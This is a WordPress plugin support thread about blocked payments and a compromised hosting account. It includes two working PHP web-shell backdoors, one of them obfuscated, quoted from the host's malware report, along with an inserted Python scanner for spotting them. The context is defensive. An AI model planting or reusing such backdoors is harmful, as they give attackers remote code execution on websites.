• Resolved Gascone

    (@gascone)


    Hello support. I got this message this morning, right after installing the plugin on one of my affiliate sites: “hello. I cant get an account. When i put in my card numbers an stuf it is an error come up. What do i do wrong? plz help me i need this”. Could this be related to your plugin (?) No way for me to find out. Most potential buyers when they encounter a problem just go to the competition and do not comment. Thank you.

    https://ww.wp.xz.cn/plugins/ip-geo-block/

Viewing 15 replies - 1 through 15 (of 19 total)
  • Thread Starter Gascone

    (@gascone)

    I forgot to mention I’m using the 3 Prevent zero-day exploit options available. Thank you.

    Plugin Author tokkonopapa

    (@tokkonopapa)

    First of all, I have to catch your situation.

    1) You have an affiliate.
    2) One of your customers wanted to buy something on your site.
    3) When he/she entered the card number, he/she got an error.
    4) So he/she sent you a message by email or something.

    And about the environment of your site.
    A) Your affiliate site is a membership site.
    B) So your customer should log in as a registered user.
    C) You enabled “Prevent zero-day exploit” on “Admin ajax/post”.

    If so, this plugin can potentially block the customer’s request. I presume that the customer got some JavaScript error on his/her terminal/device (for example a smartphone or something) and could not send the right authenticated information to your site after he/she entered the card number.

    I recommend you once set all “Prevent zero-day exploit” to “Block by country”. This doesn’t need the authenticated information any more.

    And also I expect you to enable “Record validation logs”. I’d like to see the log of the customer’s request and the user agent.

    Thanks.

    Plugin Author tokkonopapa

    (@tokkonopapa)

    Hi Gascone,
    Could you also let me know about the plugins you are using on your affiliate sites, because I don’t know much about affiliates and I should know the requirements this plugin should provide for you.

    I would appreciate it if you post the list of your plugins.

    Thanks a lot.

    Thread Starter Gascone

    (@gascone)

    Hello tokkonopapa. Thank you for your prompt response. Really appreciate it!

    My site is an affiliate site. Not a membership site. The customer is not a registered user. He was trying to access the program I promote which is a membership site. The customer got some error message and couldn’t send the purchase info (name, e-mail, etc) to the vendor’s site after he entered the card number.

    On the other hand, four days ago I installed IP GEO BLOCK plugin (Prevent zero-day exploit) on several of my sites. Yesterday afternoon I got an email from my server, Bluehost, telling me that I got tons of malware installed on six of my sites…
    “These are malicious scripts that allow for the remote execution of malware and spam. Generally this file is POSTed to, which then causes another file to be written and executed. With the process, the file is then deleted to obfuscate what it’s doing. While this allows for the arbitrary execution of about anything, it’s generally spam related actions being taken. The presence of these files indicates that your hosting account has definitely been compromised, usually through out-of-date WordPress or Joomla installations. This can be either through outdated core code or outdated/vulnerable themes, templates, plugins, components, frameworks, etc.”

    I would like to send you the e-mail (list of compromised files). Maybe you can figure out why the plugin didn’t block these malware installations. Thanks.

    Thread Starter Gascone

    (@gascone)

    By the way, I always keep my sites up to date (plugins, themes, WP version) and keep no backups or old versions of my sites on my server. Thanks.

    Plugin Author tokkonopapa

    (@tokkonopapa)

    I understand your situation and I’m sorry about that. Have you already revived your sites? For your customers, it is necessary to return your sites to a normal state ASAP. Then we would think about whether this plugin works correctly. If this plugin blocks your customer’s request but could not block the malicious access, it’s not my expectation.

    Yes, the information you received from your hosting service provider can help me to figure out the reason. And also some access logs on your server and validation logs in this plugin are very helpful.

    I think it may take a considerable period of time. But I’d like to dedicate myself to finding out the reason and the solution. So please send me any information you can get. And keep watching this thread.

    Thanks and good luck!

    Thread Starter Gascone

    (@gascone)

    Thank you for asking. Since there were so many websites compromised Bluehost cleaned the particular files. Now, I have to find and fix the vulnerability that allowed my account to be compromised.

    The malicious code detected is similar to:

    Files containing content similar to the following:

    $twqwpz = "728bb9141a4c20b69bddc0b9f13321ce"; if(isset($_REQUEST['byowg'])) { $addazjs = $_REQUEST['byowg']; eval($addazjs); exit(); } if(isset($_REQUEST['wilx'])) { $pklai = $_REQUEST['dsjblrdj']; $zpxzt = $_REQUEST['wilx']; $asjs = fopen($zpxzt, 'w'); $fbedhto = fwrite($asjs, $pklai); fclose($asjs); echo $fbedhto; exit(); }
    
    ?>

    OR

    <?php                                                   $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n272748'];if(isset($s22)){eval($s21($s22));}?>

    Do you want me to send you yesterday’s validation logs or which dates (?) Thank you
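
A defender's reading of the two snippets in the post above, as an added example that is not part of the thread or of the IP Geo Block plugin: a small triage scanner that folds the string-index obfuscation back into plain names and reports where request data reaches `eval`, `fopen` or `fwrite`. The function names, the regex heuristics (this is not a PHP parser) and the `PLAIN` and `BENIGN` samples are assumptions made for illustration.

```python
import re

# Request superglobals, written directly or as ${"_POST"} after string folding.
SUPERGLOBAL = r'\$(?:_(?:REQUEST|POST|GET|COOKIE)|\{"_(?:REQUEST|POST|GET|COOKIE)"\})'
CASE = {'strtolower': str.lower, 'strtoupper': str.upper}

def deobfuscate(src):
    """Fold $s[i].$s[j]... chains over known string literals, then strtolower/strtoupper."""
    literals = dict(re.findall(r'\$(\w+)\s*=\s*"([^"$\\]*)"\s*;', src))
    def fold_chain(m):
        text = literals.get(m.group(1))
        idx = [int(i) for i in re.findall(r'\[(\d+)\]', m.group(0))]
        if text is None or any(i >= len(text) for i in idx):
            return m.group(0)          # unknown variable or bad index: leave as is
        return '"' + ''.join(text[i] for i in idx) + '"'
    src = re.sub(r'\$(\w+)\[\d+\](?:\s*\.\s*\$\1\[\d+\])*', fold_chain, src)
    return re.sub(r'(strtolower|strtoupper)\(\s*"([^"]*)"\s*\)',
                  lambda m: '"' + CASE[m.group(1)](m.group(2)) + '"', src)

def find_backdoor_indicators(src):
    """Return (sink, decoders) pairs where request-controlled data reaches a sink."""
    code = deobfuscate(src)
    # Variables assigned straight from a request superglobal are attacker-controlled.
    tainted = set(re.findall(r'\$(\w+)\s*=\s*' + SUPERGLOBAL + r'\s*\[', code))
    # Variables holding a decoder name make $var(...) a hidden function call.
    decoders = dict(re.findall(r'\$(\w+)\s*=\s*"(base64_decode|gzinflate|str_rot13)"', code))
    hits = []
    for sink in ('eval', 'assert', 'fopen', 'fwrite'):
        for args in re.findall(r'\b' + sink + r'\s*\(([^;]*)\)\s*;', code):
            used = set(re.findall(r'\$(\w+)', args))
            if used & tainted or re.search(SUPERGLOBAL, args):
                hits.append((sink, sorted(decoders[v] for v in used if v in decoders)))
    return hits

# Second snippet from the post above, used here as scanner input.
OBFUSCATED = r'''<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n272748'];if(isset($s22)){eval($s21($s22));}?>'''
# Constructed sample with the same shape as the first snippet (names invented).
PLAIN = r'''<?php if(isset($_REQUEST['a'])) { $c = $_REQUEST['a']; eval($c); exit(); } if(isset($_REQUEST['p'])) { $d = $_REQUEST['b']; $p = $_REQUEST['p']; $h = fopen($p, 'w'); $n = fwrite($h, $d); fclose($h); echo $n; exit(); } ?>'''
# Constructed benign file.
BENIGN = '<?php $name = "world"; echo "hello " . strtoupper($name); ?>'

if __name__ == '__main__':
    for label, sample in (('obfuscated', OBFUSCATED), ('plain', PLAIN), ('benign', BENIGN)):
        print(label, find_backdoor_indicators(sample))
```

A hit is a reason to inspect the file and the web server access log for POST requests to it, not proof of compromise on its own.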

    Plugin Author tokkonopapa

    (@tokkonopapa)

    Hi Gascone,
    I’d like to give you some important notices about this topic. Please contact me at tokkonopapa @ yahoo.com by email (delete spaces around @).

    Dear moderators.
    I’ll ask you to delete the previous list of files for security reasons.
    I appreciate your help.
    Thanks.

    Plugin Author tokkonopapa

    (@tokkonopapa)

    Maybe I subscribed without modlook tag.
    Thanks.

    @tokkonopapa. You did subscribe to the modlook your last post and it was determined that there is no “security reason” to remove any of the file paths.

    Thread Starter Gascone

    (@gascone)

    Hello Justin Greer. What if I ask to please remove the file paths? Thanks.

    Thread Starter Gascone

    (@gascone)

    Justin, I knew it was not a very good idea when I posted the file paths. I thought the post could be removed upon request though. That’s what I’m requesting right now. Thank you.

    I am going to remove the paths but do note the forum guideline below. It is debatable that file paths are a security risk so in the absence of certainty….

    When a post is made and people contribute answers to an issue, that then becomes part of the community resource for others to benefit from. Deleting posts removes this added value. Forum topics will only be edited or deleted if they represent a valid legal, security, or safety concern.

    Plugin Author tokkonopapa

    (@tokkonopapa)

    Hi Justin,
    Thank you for your investigation of this topic. And I also appreciate your moderation. I hope my guess or anxiety is misdirected.

    @gascone, Would you send me an email? Let me explain my thinking. Maybe I can help you to improve your site management. Of course it’s your choice. But I think I can’t identify your two questions about this plugin in this current situation even if you already cleaned up the infected files.

    1. This plugin potentially blocks your customer’s request.
    2. This plugin can’t block malicious access which infects your site with back door.

    Thanks.

    Thread Starter Gascone

    (@gascone)

    Hi Justin. Really appreciate you honored my request. My concern was giving away my sites’ vulnerabilities and leaving them exposed to more of the same. The fact that malicious code was installed on some of my sites is still there anyway. Thank you 🙂

    @tokkonopapa, Thank you very much for offering your help. I wish more software developers were as concerned for their product users as you are! I sent you an e-mail @ 10:56 am (I’ll resend it). I have good news for you and for the forum… I’ve been making sales on some of my other sites. I didn’t deactivate the plugin on those sites. I know now that probably I had WordFence Lockdown mode on that particular site since it was recently targeted and under brute force attack for 3 days. I couldn’t tell for sure because the WordFence settings only showed me “custom settings”, but I’m pretty sure that was the reason why my customer’s payment was blocked.


The topic ‘Could the plugin be blocking payments?’ is closed to new replies.